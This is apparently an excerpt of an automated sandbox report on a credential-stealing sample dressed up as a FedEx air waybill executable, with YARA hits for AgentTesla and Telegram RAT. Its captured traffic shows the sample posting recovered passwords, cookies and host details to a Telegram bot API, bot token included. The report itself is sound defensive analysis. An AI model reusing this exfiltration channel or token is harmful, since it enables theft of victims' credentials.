                                                                            {"ok":true,"result":{"message_id":1828,"from":{"id":1881721018,"is_bot":true,"first_name":"evilc0de","username":"evilc0de_bot"},"chat":{"id":1748127586,"first_name":"evilc0de","username":"evilc0de","type":"private"},"date":1637862618,"document":{"file_name":"user-128757 2021-11-25 09-59-22.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIHJGGfzNq3xPlvdNKuuWOMmi0i0d_-AAKiCwACRFj5UPeAoRbRWnzoIgQ","file_unique_id":"AgADogsAAkRY-VA","file_size":442},"caption":"New PW Recovered!\n\nUser Name: user/128757\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            1192.168.2.549814149.154.167.220443C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            2021-11-25 17:50:20 UTC2OUTPOST /bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendDocument HTTP/1.1
                                                                            Content-Type: multipart/form-data; boundary=---------------------------8d9b06051514af6
                                                                            Host: api.telegram.org
                                                                            Content-Length: 1900
                                                                            Expect: 100-continue
                                                                            2021-11-25 17:50:20 UTC2INHTTP/1.1 100 Continue
                                                                            2021-11-25 17:50:20 UTC2OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 62 30 36 30 35 31 35 31 34 61 66 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 37 34 38 31 32 37 35 38 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 62 30 36 30 35 31 35 31 34 61 66 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 43 6f 6f 6b 69 65 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 61 6c 66 6f 6e 73 2f 31 32 38 37 35 37 0a 4f
                                                                            Data Ascii: -----------------------------8d9b06051514af6Content-Disposition: form-data; name="chat_id"1748127586-----------------------------8d9b06051514af6Content-Disposition: form-data; name="caption"New Cookie Recovered!User Name: user/128757O
                                                                            2021-11-25 17:50:20 UTC3OUTData Raw: 1b 1b 43 a6 3d 86 a6 b3 9b 5d f0 1d cd 91 90 c9 4b 86 c6 14 53 cb b2 fc 22 35 d7 87 32 c9 78 5f 46 a6 c1 ab 13 16 a2 ce 1c 85 a8 33 05 4d 4d cd ee aa ba 68 40 20 7a 61 98 ed 31 ef cd d9 cd 2a 6a c9 e2 b3 69 a5 bc 14 94 48 f9 c1 b3 4b a8 ae ab ad 15 f6 86 67 57 51 9e 59 aa 13 5d 7f 58 3f 4e 4e d0 59 19 89 de 64 d7 8e 68 aa 63 6b b4 a2 63 e5 ee 6c 4f c5 7b a2 a9 41 da 2d 0f 86 e8 95 61 a8 a8 de d4 e8 aa aa 6b af 5d a8 5b 4e 0b 4a c4 b9 3a 7b fb 25 ce fa f6 d9 51 94 de 26 d2 f7 d2 39 fb 06 00 00 00 00 00 00 00 ff 4a b7 88 62 bb 7f f6 bc 46 e3 f9 a2 6a e9 43 39 a6 8c 3a 87 2e bc 10 d9 b0 dc 25 06 fc d7 52 2b 05 b1 c1 9f cf ab 45 c5 b4 54 ab 64 36 47 96 12 67 ff 3f 43 a4 19 e9 07 e9 cb 7f fa bf 00 00 00 00 00 00 00 c0 a2 02 62 bb b0 c0 29 80 b8 4c 0c 08 e5 67
                                                                            Data Ascii: C=]KS"52x_F3MMh@ za1*jiHKgWQY]X?NNYdhckclO{A-ak][NJ:{%Q&9JbFjC9:.%R+ETd6Gg?Cb)Lg
                                                                            2021-11-25 17:50:20 UTC4INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Thu, 25 Nov 2021 17:50:20 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 628
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                            {"ok":true,"result":{"message_id":1829,"from":{"id":1881721018,"is_bot":true,"first_name":"evilc0de","username":"evilc0de_bot"},"chat":{"id":1748127586,"first_name":"evilc0de","username":"evilc0de","type":"private"},"date":1637862620,"document":{"file_name":"user-128757 2021-11-25 10-08-34.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAIHJWGfzNyKPKRjN_VBk8WARsop4AwxAAKjCwACRFj5UK8WrT-g3WnaIgQ","file_unique_id":"AgADowsAAkRY-VA","file_size":1319},"caption":"New Cookie Recovered!\n\nUser Name: user/128757\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                                            Code Manipulations

                                                                            Statistics

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            Analysis Process: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe PID: 5244 Parent PID: 5476

                                                                            General

                                                                            Start time:18:48:25
                                                                            Start date:25/11/2021
                                                                            Path:C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe"
                                                                            Imagebase:0xb50000
                                                                            File size:517120 bytes
                                                                            MD5 hash:994F1F286B24022AF59BC5506B1E2871
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.261292872.0000000002F26000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.261127000.0000000002EA1000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.263619418.0000000003EAD000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.263619418.0000000003EAD000.00000004.00000001.sdmp, Author: Joe Security
                                                                            Reputation:low

                                                                            Analysis Process: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe PID: 5604 Parent PID: 5244

                                                                            General

                                                                            Start time:18:48:28
                                                                            Start date:25/11/2021
                                                                            Path:C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                                                                            Imagebase:0xdb0000
                                                                            File size:517120 bytes
                                                                            MD5 hash:994F1F286B24022AF59BC5506B1E2871
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000000.258283858.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000000.258283858.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000000.256875551.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000000.256875551.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000000.257251923.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000000.257251923.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000000.257782427.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000000.257782427.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.514650311.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000002.514650311.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                            Reputation:low

                                                                            Disassembly

                                                                            Code Analysis

                                                                            Reset < >